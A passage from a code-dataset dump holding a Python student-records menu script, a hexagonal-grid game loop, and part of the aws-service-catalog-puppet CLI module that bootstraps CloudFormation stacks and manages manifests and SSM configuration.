'r') as file:\r\n print(\"id|name|roll_no|marks\")\r\n for students in file:\r\n student = tuple(students.strip('\\n').split(','))\r\n stud_id, stud_name, roll_no, marks = student\r\n # print(student)\r\n print(\"{}|{}|{}|{}\".format(stud_id, stud_name, roll_no, marks))\r\n\r\n\r\ndef menu():\r\n print()\r\n print('------------MENU------------')\r\n print('1.SHOW ALL STUDENTS')\r\n print('2.INSERT NEW STUDENT')\r\n print('3.UPDATE EXISTING STUDENT')\r\n print('4.DELETE STUDENT')\r\n print('5.EXIT')\r\n\r\n\r\nmenu()\r\noption = input(\"Enter Option from Above Menu ! 
>> \")\r\n\r\nif option == '1':\r\n read(db)\r\nelif option == '2':\r\n name = input(\"Enter Student Name >> \")\r\n roll_no = input(\"Enter Student Roll Number >> \")\r\n marks = input(\"Enter Student Marks >> \")\r\n insert(db, stud_name=name, roll_no=roll_no, marks=marks)\r\nelif option == '3':\r\n std_id = input(\"Enter Student Id >> \")\r\n name = input(\"Enter Student Name To Update >> \")\r\n roll_no = input(\"Enter Student Roll Number To Update >> \")\r\n marks = input(\"Enter Student Marks To Update >> \")\r\n update(db, std_id=std_id, name=name, roll_no=roll_no, marks=marks)\r\nelif option == '4':\r\n std_id = input(\"Enter Student Id >> \")\r\n delete(db, std_id=std_id)\r\nelif option == '5':\r\n exit(0)\r\nelse:\r\n print(\"Please Enter Valid Input !\")\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","sub_path":"4/4_1_c.py","file_name":"4_1_c.py","file_ext":"py","file_size_in_byte":4241,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"333965757","text":"import ast\n\nfrom matplotlib import pyplot as plt\nfrom environment.hexagonal_grid import HexagonalGrid\nfrom environment.universal_action import UniversalAction\nfrom utils.config_parser import Config\n\n\ndef normal_game():\n env = HexagonalGrid(Config.win_multiplier)\n\n env.visualize(False)\n\n while True:\n # Check win condition\n if env.check_win_condition():\n print('Congratulations, you won!')\n break\n\n legal_actions = env.get_legal_actions()\n\n print('-----\\nLegal moves:')\n for action in legal_actions:\n print(f'From: {action[0]}, To: {action[1]}')\n print('-----')\n\n first_input = input('Enter start node: ')\n if first_input == 'q':\n break\n\n if first_input == 'undo':\n print('Action reversed')\n env.undo_action()\n env.visualize(False)\n continue\n\n try:\n start_node = tuple(ast.literal_eval(first_input))\n end_node = tuple(ast.literal_eval(input('Enter end node: ')))\n except:\n print('Invalid input, try again!')\n continue\n\n if (start_node, end_node) not in legal_actions:\n print('Illegal move, try again!')\n continue\n\n action = UniversalAction()\n action.action = (start_node, end_node)\n env.execute_action(action)\n env.visualize(False)\n\n plt.close()\n","sub_path":"src/utils/normal_game.py","file_name":"normal_game.py","file_ext":"py","file_size_in_byte":1424,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"177727891","text":"# Copyright 2019 Amazon.com, Inc. or its affiliates. All Rights Reserved.\n# SPDX-License-Identifier: Apache-2.0\nfrom pathlib import Path\n\nimport cfn_tools\nimport requests\nimport terminaltables\n\nimport shutil\nfrom threading import Thread\n\nimport pkg_resources\nimport yaml\nimport logging\nimport os\nimport click\nfrom datetime import datetime\n\nfrom jinja2 import Template\nfrom pykwalify.core import Core\nfrom betterboto import client as betterboto_client\n\nfrom servicecatalog_puppet import manifest_utils_for_launches\nfrom servicecatalog_puppet.workflow import management as management_tasks\nfrom servicecatalog_puppet.workflow import provisioning as provisioning_tasks\nfrom servicecatalog_puppet.workflow import runner as runner\nfrom servicecatalog_puppet.workflow import launch as launch_tasks\nfrom servicecatalog_puppet.workflow import (\n lambda_invocations as lambda_invocations_tasks,\n)\nfrom servicecatalog_puppet.workflow import (\n spoke_local_portfolios as spoke_local_portfolios_tasks,\n)\nfrom servicecatalog_puppet import config\nfrom servicecatalog_puppet import manifest_utils\nfrom servicecatalog_puppet import aws\n\nfrom servicecatalog_puppet import asset_helpers\nfrom servicecatalog_puppet import constants\n\nimport traceback\n\nlogger = logging.getLogger()\nlogger.setLevel(logging.INFO)\n\n\ndef cli(info, info_line_numbers):\n if info:\n logging.basicConfig(\n format=\"%(levelname)s %(threadName)s %(message)s\", level=logging.INFO\n )\n if info_line_numbers:\n logging.basicConfig(\n format=\"%(levelname)s %(threadName)s [%(filename)s:%(lineno)d] %(message)s\",\n datefmt=\"%Y-%m-%d:%H:%M:%S\",\n level=logging.INFO,\n )\n\n\ndef reset_provisioned_product_owner(f):\n puppet_account_id = config.get_puppet_account_id()\n current_account_id = puppet_account_id\n manifest = manifest_utils.load(f, puppet_account_id)\n\n task_defs = manifest_utils_for_launches.generate_launch_tasks(\n manifest, puppet_account_id, False, False\n )\n\n tasks_to_run = []\n for task in task_defs:\n task_status = task.get(\"status\")\n if task_status == constants.PROVISIONED:\n tasks_to_run.append(\n provisioning_tasks.ResetProvisionedProductOwnerTask(\n launch_name=task.get(\"launch_name\"),\n account_id=task.get(\"account_id\"),\n region=task.get(\"region\"),\n )\n )\n\n cache_invalidator = str(datetime.now())\n\n runner.run_tasks(\n puppet_account_id,\n current_account_id,\n tasks_to_run,\n 10,\n cache_invalidator=cache_invalidator,\n on_complete_url=None,\n )\n\n\ndef generate_tasks(\n f,\n puppet_account_id,\n executor_account_id,\n single_account=None,\n is_dry_run=False,\n execution_mode=\"hub\",\n cache_invalidator=\"now\",\n):\n should_use_sns = config.get_should_use_sns(\n puppet_account_id, os.environ.get(\"AWS_DEFAULT_REGION\")\n )\n should_use_product_plans = config.get_should_use_product_plans(\n puppet_account_id, os.environ.get(\"AWS_DEFAULT_REGION\")\n )\n\n return [\n launch_tasks.LaunchSectionTask(\n manifest_file_path=f.name,\n puppet_account_id=puppet_account_id,\n should_use_sns=should_use_sns,\n should_use_product_plans=should_use_product_plans,\n include_expanded_from=False,\n single_account=single_account,\n is_dry_run=is_dry_run,\n execution_mode=execution_mode,\n cache_invalidator=cache_invalidator,\n ),\n spoke_local_portfolios_tasks.SpokeLocalPortfolioSectionTask(\n manifest_file_path=f.name,\n puppet_account_id=puppet_account_id,\n should_use_sns=should_use_sns,\n should_use_product_plans=should_use_product_plans,\n 
include_expanded_from=False,\n single_account=single_account,\n is_dry_run=is_dry_run,\n execution_mode=execution_mode,\n cache_invalidator=cache_invalidator,\n ),\n lambda_invocations_tasks.LambdaInvocationsSectionTask(\n manifest_file_path=f.name,\n puppet_account_id=puppet_account_id,\n should_use_sns=should_use_sns,\n should_use_product_plans=should_use_product_plans,\n include_expanded_from=False,\n single_account=single_account,\n is_dry_run=is_dry_run,\n execution_mode=execution_mode,\n cache_invalidator=cache_invalidator,\n ),\n ]\n\n\ndef deploy(\n f,\n puppet_account_id,\n executor_account_id,\n single_account=None,\n num_workers=10,\n is_dry_run=False,\n is_list_launches=False,\n execution_mode=\"hub\",\n on_complete_url=None,\n):\n cache_invalidator = str(datetime.now())\n\n tasks_to_run = generate_tasks(\n f,\n puppet_account_id,\n executor_account_id,\n single_account,\n is_dry_run,\n execution_mode,\n cache_invalidator,\n )\n runner.run_tasks(\n puppet_account_id,\n executor_account_id,\n tasks_to_run,\n num_workers,\n is_dry_run,\n is_list_launches,\n execution_mode,\n cache_invalidator,\n on_complete_url,\n )\n\n\ndef graph(f):\n current_account_id = puppet_account_id = config.get_puppet_account_id()\n tasks_to_run = generate_tasks(f, puppet_account_id, current_account_id)\n lines = []\n nodes = []\n for task in tasks_to_run:\n nodes.append(task.graph_node())\n lines += task.get_graph_lines()\n click.echo(\"digraph G {\\n\")\n click.echo(\"node [shape=record fontname=Arial];\")\n for node in nodes:\n click.echo(f\"{node};\")\n for line in lines:\n click.echo(f'{line} [label=\"depends on\"];')\n click.echo(\"}\")\n\n\ndef _do_bootstrap_spoke(\n puppet_account_id,\n cloudformation,\n puppet_version,\n permission_boundary,\n puppet_role_name,\n puppet_role_path,\n):\n template = asset_helpers.read_from_site_packages(\n \"{}-spoke.template.yaml\".format(constants.BOOTSTRAP_STACK_NAME)\n )\n template = Template(template).render(VERSION=puppet_version)\n args = {\n \"StackName\": \"{}-spoke\".format(constants.BOOTSTRAP_STACK_NAME),\n \"TemplateBody\": template,\n \"Capabilities\": [\"CAPABILITY_NAMED_IAM\"],\n \"Parameters\": [\n {\n \"ParameterKey\": \"PuppetAccountId\",\n \"ParameterValue\": str(puppet_account_id),\n },\n {\n \"ParameterKey\": \"PermissionBoundary\",\n \"ParameterValue\": permission_boundary,\n \"UsePreviousValue\": False,\n },\n {\n \"ParameterKey\": \"Version\",\n \"ParameterValue\": puppet_version,\n \"UsePreviousValue\": False,\n },\n {\n \"ParameterKey\": \"PuppetRoleName\",\n \"ParameterValue\": puppet_role_name,\n \"UsePreviousValue\": False,\n },\n {\n \"ParameterKey\": \"PuppetRolePath\",\n \"ParameterValue\": puppet_role_path,\n \"UsePreviousValue\": False,\n },\n ],\n \"Tags\": [{\"Key\": \"ServiceCatalogPuppet:Actor\", \"Value\": \"Framework\",}],\n }\n cloudformation.create_or_update(**args)\n logger.info(\"Finished bootstrap of spoke\")\n\n\ndef bootstrap_spoke_as(\n puppet_account_id,\n iam_role_arns,\n permission_boundary,\n puppet_role_name,\n puppet_role_path,\n):\n cross_accounts = []\n index = 0\n for role in iam_role_arns:\n cross_accounts.append((role, \"bootstrapping-role-{}\".format(index)))\n index += 1\n\n with betterboto_client.CrossMultipleAccountsClientContextManager(\n \"cloudformation\", cross_accounts\n ) as cloudformation:\n _do_bootstrap_spoke(\n puppet_account_id,\n cloudformation,\n config.get_puppet_version(),\n permission_boundary,\n puppet_role_name,\n puppet_role_path,\n )\n\n\ndef _do_bootstrap(\n puppet_version,\n 
puppet_account_id,\n with_manual_approvals,\n puppet_code_pipeline_role_permission_boundary,\n source_role_permissions_boundary,\n puppet_generate_role_permission_boundary,\n puppet_deploy_role_permission_boundary,\n puppet_provisioning_role_permissions_boundary,\n cloud_formation_deploy_role_permissions_boundary,\n deploy_environment_compute_type,\n deploy_num_workers,\n source_provider,\n owner,\n repo,\n branch,\n poll_for_source_changes,\n webhook_secret,\n puppet_role_name,\n puppet_role_path,\n):\n click.echo(\"Starting bootstrap\")\n should_use_eventbridge = config.get_should_use_eventbridge(\n puppet_account_id, os.environ.get(\"AWS_DEFAULT_REGION\")\n )\n if should_use_eventbridge:\n with betterboto_client.ClientContextManager(\"events\") as events:\n try:\n events.describe_event_bus(Name=constants.EVENT_BUS_NAME)\n except events.exceptions.ResourceNotFoundException:\n events.create_event_bus(Name=constants.EVENT_BUS_NAME,)\n\n all_regions = config.get_regions(\n puppet_account_id, os.environ.get(\"AWS_DEFAULT_REGION\")\n )\n with betterboto_client.MultiRegionClientContextManager(\n \"cloudformation\", all_regions\n ) as clients:\n click.echo(\"Creating {}-regional\".format(constants.BOOTSTRAP_STACK_NAME))\n threads = []\n template = asset_helpers.read_from_site_packages(\n \"{}.template.yaml\".format(\n \"{}-regional\".format(constants.BOOTSTRAP_STACK_NAME)\n )\n )\n template = Template(template).render(VERSION=puppet_version)\n args = {\n \"StackName\": \"{}-regional\".format(constants.BOOTSTRAP_STACK_NAME),\n \"TemplateBody\": template,\n \"Capabilities\": [\"CAPABILITY_IAM\"],\n \"Parameters\": [\n {\n \"ParameterKey\": \"Version\",\n \"ParameterValue\": puppet_version,\n \"UsePreviousValue\": False,\n },\n {\n \"ParameterKey\": \"DefaultRegionValue\",\n \"ParameterValue\": os.environ.get(\"AWS_DEFAULT_REGION\"),\n \"UsePreviousValue\": False,\n },\n ],\n \"Tags\": [{\"Key\": \"ServiceCatalogPuppet:Actor\", \"Value\": \"Framework\",}],\n }\n for client_region, client in clients.items():\n process = Thread(\n name=client_region, target=client.create_or_update, kwargs=args\n )\n process.start()\n threads.append(process)\n for process in threads:\n process.join()\n click.echo(\n \"Finished creating {}-regional\".format(constants.BOOTSTRAP_STACK_NAME)\n )\n\n source_args = {\"Provider\": source_provider}\n if source_provider == \"CodeCommit\":\n source_args.update(\n {\"Configuration\": {\"RepositoryName\": repo, \"BranchName\": branch,},}\n )\n elif source_provider == \"GitHub\":\n source_args.update(\n {\n \"Configuration\": {\n \"Owner\": owner,\n \"Repo\": repo,\n \"Branch\": branch,\n \"PollForSourceChanges\": poll_for_source_changes,\n \"SecretsManagerSecret\": webhook_secret,\n },\n }\n )\n\n with betterboto_client.ClientContextManager(\"cloudformation\") as cloudformation:\n click.echo(\"Creating {}\".format(constants.BOOTSTRAP_STACK_NAME))\n template = asset_helpers.read_from_site_packages(\n \"{}.template.yaml\".format(constants.BOOTSTRAP_STACK_NAME)\n )\n template = Template(template).render(\n VERSION=puppet_version,\n ALL_REGIONS=all_regions,\n Source=source_args,\n is_caching_enabled=config.is_caching_enabled(\n puppet_account_id, os.environ.get(\"AWS_DEFAULT_REGION\")\n ),\n )\n args = {\n \"StackName\": constants.BOOTSTRAP_STACK_NAME,\n \"TemplateBody\": template,\n \"Capabilities\": [\"CAPABILITY_NAMED_IAM\"],\n \"Parameters\": [\n {\n 
\"ParameterKey\": \"Version\",\n \"ParameterValue\": puppet_version,\n \"UsePreviousValue\": False,\n },\n {\n \"ParameterKey\": \"OrgIamRoleArn\",\n \"ParameterValue\": str(\n config.get_org_iam_role_arn(puppet_account_id)\n ),\n \"UsePreviousValue\": False,\n },\n {\n \"ParameterKey\": \"WithManualApprovals\",\n \"ParameterValue\": \"Yes\" if with_manual_approvals else \"No\",\n \"UsePreviousValue\": False,\n },\n {\n \"ParameterKey\": \"PuppetCodePipelineRolePermissionBoundary\",\n \"ParameterValue\": puppet_code_pipeline_role_permission_boundary,\n \"UsePreviousValue\": False,\n },\n {\n \"ParameterKey\": \"SourceRolePermissionsBoundary\",\n \"ParameterValue\": source_role_permissions_boundary,\n \"UsePreviousValue\": False,\n },\n {\n \"ParameterKey\": \"PuppetGenerateRolePermissionBoundary\",\n \"ParameterValue\": puppet_generate_role_permission_boundary,\n \"UsePreviousValue\": False,\n },\n {\n \"ParameterKey\": \"PuppetDeployRolePermissionBoundary\",\n \"ParameterValue\": puppet_deploy_role_permission_boundary,\n \"UsePreviousValue\": False,\n },\n {\n \"ParameterKey\": \"PuppetProvisioningRolePermissionsBoundary\",\n \"ParameterValue\": puppet_provisioning_role_permissions_boundary,\n \"UsePreviousValue\": False,\n },\n {\n \"ParameterKey\": \"CloudFormationDeployRolePermissionsBoundary\",\n \"ParameterValue\": cloud_formation_deploy_role_permissions_boundary,\n \"UsePreviousValue\": False,\n },\n {\n \"ParameterKey\": \"DeployEnvironmentComputeType\",\n \"ParameterValue\": deploy_environment_compute_type,\n \"UsePreviousValue\": False,\n },\n {\n \"ParameterKey\": \"DeployNumWorkers\",\n \"ParameterValue\": str(deploy_num_workers),\n \"UsePreviousValue\": False,\n },\n {\n \"ParameterKey\": \"PuppetRoleName\",\n \"ParameterValue\": puppet_role_name,\n \"UsePreviousValue\": False,\n },\n {\n \"ParameterKey\": \"PuppetRolePath\",\n \"ParameterValue\": puppet_role_path,\n \"UsePreviousValue\": False,\n },\n ],\n }\n cloudformation.create_or_update(**args)\n\n click.echo(\"Finished creating {}.\".format(constants.BOOTSTRAP_STACK_NAME))\n if source_provider == \"CodeCommit\":\n with betterboto_client.ClientContextManager(\"codecommit\") as codecommit:\n response = codecommit.get_repository(repositoryName=repo)\n clone_url = response.get(\"repositoryMetadata\").get(\"cloneUrlHttp\")\n clone_command = (\n \"git clone --config 'credential.helper=!aws codecommit credential-helper $@' \"\n \"--config 'credential.UseHttpPath=true' {}\".format(clone_url)\n )\n click.echo(\n \"You need to clone your newly created repo now and will then need to seed it: \\n{}\".format(\n clone_command\n )\n )\n\n\ndef bootstrap_spoke(\n puppet_account_id, permission_boundary, puppet_role_name, puppet_role_path\n):\n with betterboto_client.ClientContextManager(\"cloudformation\") as cloudformation:\n _do_bootstrap_spoke(\n puppet_account_id,\n cloudformation,\n config.get_puppet_version(),\n permission_boundary,\n puppet_role_name,\n puppet_role_path,\n )\n\n\ndef bootstrap_branch(\n branch_to_bootstrap,\n puppet_account_id,\n with_manual_approvals,\n puppet_code_pipeline_role_permission_boundary,\n source_role_permissions_boundary,\n puppet_generate_role_permission_boundary,\n puppet_deploy_role_permission_boundary,\n puppet_provisioning_role_permissions_boundary,\n cloud_formation_deploy_role_permissions_boundary,\n deploy_num_workers,\n source_provider,\n owner,\n repo,\n branch,\n poll_for_source_changes,\n webhook_secret,\n puppet_role_name,\n puppet_role_path,\n):\n _do_bootstrap(\n 
\"https://github.com/awslabs/aws-service-catalog-puppet/archive/{}.zip\".format(\n branch_to_bootstrap\n ),\n puppet_account_id,\n with_manual_approvals,\n puppet_code_pipeline_role_permission_boundary,\n source_role_permissions_boundary,\n puppet_generate_role_permission_boundary,\n puppet_deploy_role_permission_boundary,\n puppet_provisioning_role_permissions_boundary,\n cloud_formation_deploy_role_permissions_boundary,\n constants.DEPLOY_ENVIRONMENT_COMPUTE_TYPE_DEFAULT,\n deploy_num_workers,\n source_provider,\n owner,\n repo,\n branch,\n poll_for_source_changes,\n webhook_secret,\n puppet_role_name,\n puppet_role_path,\n )\n\n\ndef bootstrap(\n with_manual_approvals,\n puppet_account_id,\n puppet_code_pipeline_role_permission_boundary,\n source_role_permissions_boundary,\n puppet_generate_role_permission_boundary,\n puppet_deploy_role_permission_boundary,\n puppet_provisioning_role_permissions_boundary,\n cloud_formation_deploy_role_permissions_boundary,\n deploy_environment_compute_type,\n deploy_num_workers,\n source_provider,\n owner,\n repo,\n branch,\n poll_for_source_changes,\n webhook_secret,\n puppet_role_name,\n puppet_role_path,\n):\n _do_bootstrap(\n config.get_puppet_version(),\n puppet_account_id,\n with_manual_approvals,\n puppet_code_pipeline_role_permission_boundary,\n source_role_permissions_boundary,\n puppet_generate_role_permission_boundary,\n puppet_deploy_role_permission_boundary,\n puppet_provisioning_role_permissions_boundary,\n cloud_formation_deploy_role_permissions_boundary,\n deploy_environment_compute_type,\n deploy_num_workers,\n source_provider,\n owner,\n repo,\n branch,\n poll_for_source_changes,\n webhook_secret,\n puppet_role_name,\n puppet_role_path,\n )\n\n\ndef seed(complexity, p):\n example = \"manifest-{}.yaml\".format(complexity)\n shutil.copy2(\n asset_helpers.resolve_from_site_packages(\n os.path.sep.join([\"manifests\", example])\n ),\n os.path.sep.join([p, \"manifest.yaml\"]),\n )\n\n\ndef expand(f, single_account):\n click.echo(\"Expanding\")\n puppet_account_id = config.get_puppet_account_id()\n manifest = manifest_utils.load(f, puppet_account_id)\n org_iam_role_arn = config.get_org_iam_role_arn(puppet_account_id)\n if org_iam_role_arn is None:\n click.echo(\"No org role set - not expanding\")\n new_manifest = manifest\n else:\n click.echo(\"Expanding using role: {}\".format(org_iam_role_arn))\n with betterboto_client.CrossAccountClientContextManager(\n \"organizations\", org_iam_role_arn, \"org-iam-role\"\n ) as client:\n new_manifest = manifest_utils.expand_manifest(manifest, client)\n click.echo(\"Expanded\")\n if single_account:\n click.echo(f\"Filtering for single account: {single_account}\")\n\n for account in new_manifest.get(\"accounts\", []):\n if account.get(\"account_id\") == single_account:\n click.echo(f\"Found single account: {single_account}\")\n new_manifest[\"accounts\"] = [account]\n break\n\n click.echo(\"Filtered\")\n\n new_name = f.name.replace(\".yaml\", \"-expanded.yaml\")\n logger.info(\"Writing new manifest: {}\".format(new_name))\n with open(new_name, \"w\") as output:\n output.write(yaml.safe_dump(new_manifest, default_flow_style=False))\n\n\ndef validate(f):\n logger.info(\"Validating {}\".format(f.name))\n c = Core(\n source_file=f.name,\n schema_files=[asset_helpers.resolve_from_site_packages(\"schema.yaml\")],\n extensions=[\n asset_helpers.resolve_from_site_packages(\"puppet_schema_extensions.py\")\n ],\n )\n c.validate(raise_exception=True)\n click.echo(\"Finished validating: {}\".format(f.name))\n 
click.echo(\"Finished validating: OK\")\n\n\ndef version():\n click.echo(\n \"cli version: {}\".format(\n pkg_resources.require(\"aws-service-catalog-puppet\")[0].version\n )\n )\n with betterboto_client.ClientContextManager(\"ssm\") as ssm:\n response = ssm.get_parameter(Name=\"service-catalog-puppet-regional-version\")\n click.echo(\n \"regional stack version: {} for region: {}\".format(\n response.get(\"Parameter\").get(\"Value\"),\n response.get(\"Parameter\").get(\"ARN\").split(\":\")[3],\n )\n )\n response = ssm.get_parameter(Name=\"service-catalog-puppet-version\")\n click.echo(\"stack version: {}\".format(response.get(\"Parameter\").get(\"Value\"),))\n\n\ndef upload_config(config):\n with betterboto_client.ClientContextManager(\"ssm\") as ssm:\n ssm.put_parameter(\n Name=constants.CONFIG_PARAM_NAME,\n Type=\"String\",\n Value=yaml.safe_dump(config),\n Overwrite=True,\n )\n click.echo(\"Uploaded config\")\n\n\ndef set_org_iam_role_arn(org_iam_role_arn):\n with betterboto_client.ClientContextManager(\"ssm\") as ssm:\n ssm.put_parameter(\n Name=constants.CONFIG_PARAM_NAME_ORG_IAM_ROLE_ARN,\n Type=\"String\",\n Value=org_iam_role_arn,\n Overwrite=True,\n )\n click.echo(\"Uploaded config\")\n\n\ndef bootstrap_org_master(puppet_account_id):\n with betterboto_client.ClientContextManager(\"cloudformation\",) as cloudformation:\n org_iam_role_arn = None\n puppet_version = config.get_puppet_version()\n logger.info(\"Starting bootstrap of org master\")\n stack_name = f\"{constants.BOOTSTRAP_STACK_NAME}-org-master-{puppet_account_id}\"\n template = asset_helpers.read_from_site_packages(\n f\"{constants.BOOTSTRAP_STACK_NAME}-org-master.template.yaml\"\n )\n template = Template(template).render(\n VERSION=puppet_version, puppet_account_id=puppet_account_id\n )\n args = {\n \"StackName\": stack_name,\n \"TemplateBody\": template,\n \"Capabilities\": [\"CAPABILITY_NAMED_IAM\"],\n \"Parameters\": [\n {\n \"ParameterKey\": \"PuppetAccountId\",\n \"ParameterValue\": str(puppet_account_id),\n },\n {\n \"ParameterKey\": \"Version\",\n \"ParameterValue\": puppet_version,\n \"UsePreviousValue\": False,\n },\n ],\n \"Tags\": [{\"Key\": \"ServiceCatalogPuppet:Actor\", \"Value\": \"Framework\",}],\n }\n cloudformation.create_or_update(**args)\n response = cloudformation.describe_stacks(StackName=stack_name)\n if len(response.get(\"Stacks\")) != 1:\n raise Exception(\"Expected there to be only one {} stack\".format(stack_name))\n stack = response.get(\"Stacks\")[0]\n\n for output in stack.get(\"Outputs\"):\n if output.get(\"OutputKey\") == constants.PUPPET_ORG_ROLE_FOR_EXPANDS_ARN:\n logger.info(\"Finished bootstrap of org-master\")\n org_iam_role_arn = output.get(\"OutputValue\")\n\n if org_iam_role_arn is None:\n raise Exception(\n \"Could not find output: {} in stack: {}\".format(\n constants.PUPPET_ORG_ROLE_FOR_EXPANDS_ARN, stack_name\n )\n )\n\n click.echo(\"Bootstrapped org master, org-iam-role-arn: {}\".format(org_iam_role_arn))\n\n\ndef run(what, tail):\n pipelines = {\"puppet\": constants.PIPELINE_NAME}\n pipeline_name = pipelines.get(what)\n pipeline_execution_id = aws.run_pipeline(pipeline_name, tail)\n click.echo(\n f\"https://{os.environ.get('AWS_DEFAULT_REGION')}.console.aws.amazon.com/codesuite/codepipeline/pipelines/{pipeline_name}/executions/{pipeline_execution_id}/timeline\"\n )\n\n\ndef list_resources():\n click.echo(\"# Framework resources\")\n\n click.echo(\"## SSM Parameters used\")\n click.echo(f\"- {constants.CONFIG_PARAM_NAME}\")\n click.echo(f\"- 
{constants.CONFIG_PARAM_NAME_ORG_IAM_ROLE_ARN}\")\n\n for file in Path(__file__).parent.resolve().glob(\"*.template.yaml\"):\n if \"empty.template.yaml\" == file.name:\n continue\n template_contents = Template(open(file, \"r\").read()).render()\n template = cfn_tools.load_yaml(template_contents)\n click.echo(f\"## Resources for stack: {file.name.split('.')[0]}\")\n table_data = [\n [\"Logical Name\", \"Resource Type\", \"Name\",],\n ]\n table = terminaltables.AsciiTable(table_data)\n for logical_name, resource in template.get(\"Resources\").items():\n resource_type = resource.get(\"Type\")\n name = \"-\"\n type_to_name = {\n \"AWS::IAM::Role\": \"RoleName\",\n \"AWS::SSM::Parameter\": \"Name\",\n \"AWS::S3::Bucket\": \"BucketName\",\n \"AWS::CodePipeline::Pipeline\": \"Name\",\n \"AWS::CodeBuild::Project\": \"Name\",\n \"AWS::CodeCommit::Repository\": \"RepositoryName\",\n \"AWS::SNS::Topic\": \"TopicName\",\n \"AWS::SQS::Queue\": \"QueueName\",\n }\n\n if type_to_name.get(resource_type) is not None:\n name = resource.get(\"Properties\", {}).get(\n type_to_name.get(resource_type), \"Not Specified\"\n )\n if not isinstance(name, str):\n name = cfn_tools.dump_yaml(name)\n\n table_data.append([logical_name, resource_type, name])\n\n click.echo(table.table)\n click.echo(f\"n.b. AWS::StackName evaluates to {constants.BOOTSTRAP_STACK_NAME}\")\n\n\ndef import_product_set(f, name, portfolio_name):\n url = f\"https://raw.githubusercontent.com/awslabs/aws-service-catalog-products/master/{name}/manifest.yaml\"\n response = requests.get(url)\n logger.info(f\"Getting {url}\")\n manifest = yaml.safe_load(f.read())\n if manifest.get(\"launches\") is None:\n manifest[\"launches\"] = {}\n manifest_segment = yaml.safe_load(response.text)\n for launch_name, details in manifest_segment.get(\"launches\").items():\n details[\"portfolio\"] = portfolio_name\n manifest[\"launches\"][launch_name] = details\n with open(f.name, \"w\") as f:\n f.write(yaml.safe_dump(manifest))\n\n\ndef get_manifest():\n with betterboto_client.ClientContextManager(\"codecommit\") as codecommit:\n content = codecommit.get_file(\n repositoryName=constants.SERVICE_CATALOG_PUPPET_REPO_NAME,\n filePath=\"manifest.yaml\",\n ).get(\"fileContent\")\n return yaml.safe_load(content)\n\n\ndef save_manifest(manifest):\n with betterboto_client.ClientContextManager(\"codecommit\") as codecommit:\n parent_commit_id = (\n codecommit.get_branch(\n repositoryName=constants.SERVICE_CATALOG_PUPPET_REPO_NAME,\n branchName=\"master\",\n )\n .get(\"branch\")\n .get(\"commitId\")\n )\n codecommit.put_file(\n repositoryName=constants.SERVICE_CATALOG_PUPPET_REPO_NAME,\n branchName=\"master\",\n fileContent=yaml.safe_dump(manifest),\n parentCommitId=parent_commit_id,\n commitMessage=\"Auto generated commit\",\n filePath=f\"manifest.yaml\",\n )\n\n\ndef add_to_accounts(account_or_ou):\n manifest = get_manifest()\n manifest.get(\"accounts\").append(account_or_ou)\n save_manifest(manifest)\n\n\ndef remove_from_accounts(account_id_or_ou_id_or_ou_path):\n manifest = get_manifest()\n for account in manifest.get(\"accounts\", []):\n if account.get(\"account_id\", \"\") == account_id_or_ou_id_or_ou_path:\n manifest.get(\"accounts\").remove(account)\n return save_manifest(manifest)\n elif account.get(\"ou\", \"\") == account_id_or_ou_id_or_ou_path:\n manifest.get(\"accounts\").remove(account)\n return save_manifest(manifest)\n raise Exception(f\"Did not remove {account_id_or_ou_id_or_ou_path}\")\n\n\ndef add_to_launches(launch_name, launch):\n manifest = get_manifest()\n 
launches = manifest.get(\"launches\", {})\n launches[launch_name] = launch\n manifest[\"launches\"] = launches\n save_manifest(manifest)\n\n\ndef remove_from_launches(launch_name):\n manifest = get_manifest()\n del manifest.get(\"launches\")[launch_name]\n save_manifest(manifest)\n\n\ndef set_config_value(name, value):\n with betterboto_client.ClientContextManager(\n \"ssm\", region_name=constants.HOME_REGION\n ) as ssm:\n try:\n response = ssm.get_parameter(Name=constants.CONFIG_PARAM_NAME)\n config = yaml.safe_load(response.get(\"Parameter\").get(\"Value\"))\n except ssm.exceptions.ParameterNotFound:\n config = {}\n\n if name == \"regions\":\n config[\"regions\"] = value if len(value) > 1 else value[0].split(\",\")\n else:\n config[name] = value.upper() == \"TRUE\"\n\n upload_config(config)\n\n\ndef set_named_config_value(name, value):\n with betterboto_client.ClientContextManager(\n \"ssm\", region_name=constants.HOME_REGION\n ) as ssm:\n ssm.put_parameter(\n Name=name, Type=\"String\", Value=value, Overwrite=True,\n )\n click.echo(\"Uploaded named config\")\n\n\ndef bootstrap_spokes_in_ou(\n ou_path_or_id,\n role_name,\n iam_role_arns,\n permission_boundary,\n num_workers,\n puppet_role_name,\n puppet_role_path,\n):\n puppet_account_id = config.get_puppet_account_id()\n org_iam_role_arn = config.get_org_iam_role_arn(puppet_account_id)\n if org_iam_role_arn is None:\n click.echo(\"No org role set - not expanding\")\n else:\n click.echo(\"Expanding using role: {}\".format(org_iam_role_arn))\n with betterboto_client.CrossAccountClientContextManager(\n \"organizations\", org_iam_role_arn, \"org-iam-role\"\n ) as client:\n tasks = []\n if ou_path_or_id.startswith(\"/\"):\n ou_id = client.convert_path_to_ou(ou_path_or_id)\n else:\n ou_id = ou_path_or_id\n logging.info(f\"ou_id is {ou_id}\")\n response = client.list_children_nested(ParentId=ou_id, ChildType=\"ACCOUNT\")\n for spoke in response:\n tasks.append(\n management_tasks.BootstrapSpokeAsTask(\n puppet_account_id=puppet_account_id,\n account_id=spoke.get(\"Id\"),\n iam_role_arns=iam_role_arns,\n role_name=role_name,\n permission_boundary=permission_boundary,\n puppet_role_name=puppet_role_name,\n puppet_role_path=puppet_role_path,\n )\n )\n\n runner.run_tasks_for_bootstrap_spokes_in_ou(tasks, num_workers)\n\n\ndef handle_action_execution_detail(puppet_account_id, action_execution_detail):\n action_type_id = 